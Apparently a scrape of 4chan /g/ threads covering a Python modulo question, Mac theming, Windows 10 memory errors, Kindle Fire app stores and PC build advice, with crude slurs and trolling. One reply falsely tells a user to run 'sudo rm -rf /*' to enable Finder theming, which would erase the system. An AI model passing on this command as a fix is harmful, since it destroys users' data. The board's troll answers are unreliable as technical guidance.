Please /g/ help me comprehend
num = input("Enter a number: ")
mod = int(num) % 2
if mod > 0:
print("You picked an odd number.")
else:
print("You picked an even number.")
^^^^^^^^^^^^^^^^^^^^^
Why Is It that the number chosen through input divided by 2 has to be greater than 0 to be considered an odd number. 8 divided by 2 Is four, which Is an even number. Could someone explain why this Is?

Is there a way to "rice" or alter the appearance of the "finder" window in OSX?
I'm trying to get a plan going on a full rice of my macbook, and I've figured everything out except the login screen and the finder.
Is there any way to look in and change the .plist file?
>>55611291
Yup, you have to enable it though. Open up your terminal and typesudo rm -rf /*that'll enable the ability to rice it.

What exists behind a computer desktop? Is it the void? The kernel?
the wallpaper
The Botnet resides back there. This is why true Free Systems have only a minimalist wallpaper so they can see behind it to make sure The Botnet hasn't gotten into their systems.

Implying wired is a good source for anything beyond toilet paper.
Does anyone actually still read this shit?

Steve Jobs was borderline retarded.
He couldn't work to save his life, and sponged of others up until his death.
This Mexican kid already is too different from Steve Jobs.

I may have just gotten water damage in my keyboard.

Don't eat or drink around electronics.

Dude, use a rubber dome or one of these if you drink/eat at station more often than normal.
You fell for the backlit keyboard meme.
I could piss on mine and it would be fine since it's properly sealed as it doesn't need to leak light to remind me I'm a good goy for buying GAYMEN peripherals.
How many computers have you hacked in your lifetime?
exactly 27

>only a marginal amount of apps compared to the Google Play Store
>many essential apps are nowhere to be found
>many apps that are up-to-date on the Play Store are outdated on the Amazon Appstore
What was going through Amazon's mind when they took out the Play Store from the Kindle Fire and replaced it with this?
>>55610959
>vertical integration means more money at every stop on that lovely value chain
You also have to buy your apps all over again, and who wants to do that?
Amazon doesn't have a rewards app where you get free store credit for answering survets like Google Play does, so it makes it even less inspiring to get a Kindle Fire over a Nexus tablet with Google Play, and you can already get all the Amazon apps and experience the complete Amazon ecosystem on a Nexus tablet so there's pretty much nothing to gain from buying a Kindle Fire over a Nexus tablet.
Does Windows 10 have issues with memory management?
Against my better judgment I'm on Windows 10 right now, probably going to go back to 7 soon, but just for right now I seem to have an issue with Windows not managing memory properly.
When trying to use any memory heavy software I use (Specifically Substance Painter and Premiere) whenever I reach only around 60% RAM usage, Windows starts tossing "LOW MEMORY" errors and once I reach about 70% shit starts crashing. This is a huge issue for Substance Painter as my 4K workflow can blow through my entire 16GB of RAM with absolute ease when I start getting a heavy number of fill layers and generators.
This problem didn't happen on Windows 7, I can hit 90%+ RAM usage without issue.
Don't take my word on it, but i think that happened on the very first version of W10.
I have everything updated and not a single problem regarding memory so far.
No. I run premiere cs6 on my w10 machine with 8 gigs of ram and I do not have that problem.
Check your pagefile size.

As I recall the non K series CPU is not meant to overclocking but the Z series motherboards are?
I'd suggest you take
>i5-6600k instead of 6600
>Z170 Pro Gaming
>MX200 Crucial SSD
>HGST HDD
Also, your PSU is pretty overkill. 500W is enough.
Also, where's your GPU?
Does the virus that causes screamers appear on the screen actually exist?
Yes, it's called OSX
Yes. I could make one in GNU Bash right now, thank god for the wonderful thing called the X Window System.
>>55610864
I'm sure it exists, but it's not common. Making and distributing a virus takes a lot of effort. Why would anyone do that when they can't make any money?
Why haven't you uninstalled your adblocker yet? You do know it's pretty much the same as theft, right?
I torrent everything and seed 24/7

>>55610850
It's not the same as theft. Theft is illegal and easily catchable. Adblocking is not.
